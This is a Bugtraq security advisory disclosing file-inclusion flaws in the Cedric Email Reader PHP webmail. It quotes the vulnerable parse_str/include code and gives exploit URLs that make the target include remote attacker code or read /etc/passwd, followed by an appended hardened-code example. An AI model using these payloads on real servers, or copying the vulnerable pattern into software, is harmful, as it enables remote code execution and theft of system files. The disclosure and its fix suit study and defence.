Bugtraq mailing list archives

Cedric Email Reader (PHP)


From: MGhz <magas () mail lt>
Date: 9 Feb 2003 10:05:59 -0000



Version : 0.2;0.3;0.4 
Website : http://www.isoca.com/ 
Problems : Include file (local, remote)

Version: 0.2;0.3

File: 
--------------------------------- 
email.php3 (version 0.2) ; email.php (version 0.3)
---------------------------------

PHP Code:
--------------------------------- 
[...]
require('emailreader.ini');
if ($login > "") {
 parse_str($param);
 include($cer_skin);
 include('email.inc');
 $mbox = openimap($server, $username, $password);
 $text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[...]
---------------------------------

Exploit : 
--------------------------------- 
http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.php
--> 
include http://[attacker]/code.php on remote server 
---
include local file 
-->
http://[target]/email.php?login=attacker&cer_skin=/etc/passwd 
--------------------------------- 

Versions: 0.4

File: 
--------------------------------- 
webmail/lib/emailreader_execute_on_each_page.inc.php
---------------------------------

PHP Code:
--------------------------------- 
[...]
$param = imap_base64($login);
parse_str($param);

@include($emailreader_ini);
@include('lib/'.$server_type.'.inc.php');
@include('skin/emailreaderskin_'.$lang.'.php');
[...]
--------------------------------- 

Exploit : 
--------------------------------- 
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php
--> 
include http://[attacker]/code.php on remote server
---
include local file 
-->
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=/etc/passwd
---------------------------------


--
(if register_globals=On)
--

--
magas () mail lt
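
A hardened form of the include patterns quoted above, as an added example that is not part of the original post or of Cedric Email Reader. The `skin` parameter name, the `SKINS` list and its paths are assumptions made for illustration.

```php
<?php
// Added example (not Cedric Email Reader code). Skin names and paths
// below are hypothetical.

// Fixed, server-side list of skins; request input only selects a key.
const SKINS = [
    'default' => 'skin/emailreaderskin_default.php',
    'en'      => 'skin/emailreaderskin_en.php',
];

/**
 * Parse the packed parameter string into a local array instead of the
 * current scope, so it cannot create or overwrite variables such as
 * $cer_skin or $emailreader_ini.
 */
function parse_params(string $param): array
{
    $out = [];
    parse_str($param, $out);   // second argument: no variables are created
    return $out;
}

/** Map a requested skin name to an allowlisted path, or the default. */
function resolve_skin(array $params): string
{
    $name = $params['skin'] ?? 'default';
    // Reject non-string values (e.g. skin[]=x) and unknown names.
    if (!is_string($name) || !array_key_exists($name, SKINS)) {
        $name = 'default';
    }
    return SKINS[$name];
}

// Constructed sample inputs, including the request shapes from the advisory.
$samples = [
    'skin=en',
    'cer_skin=http://[attacker]/code.php',
    'skin=/etc/passwd',
    'skin[]=en',
];
foreach ($samples as $s) {
    // Only 'skin=en' selects a non-default file; nothing is ever included
    // from a path that came out of the request.
    printf("%-40s => %s\n", $s, resolve_skin(parse_params($s)));
}
```

The same reasoning covers `$emailreader_ini` in 0.4: assign it a fixed path in the script before the `include` so that request input cannot supply it.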

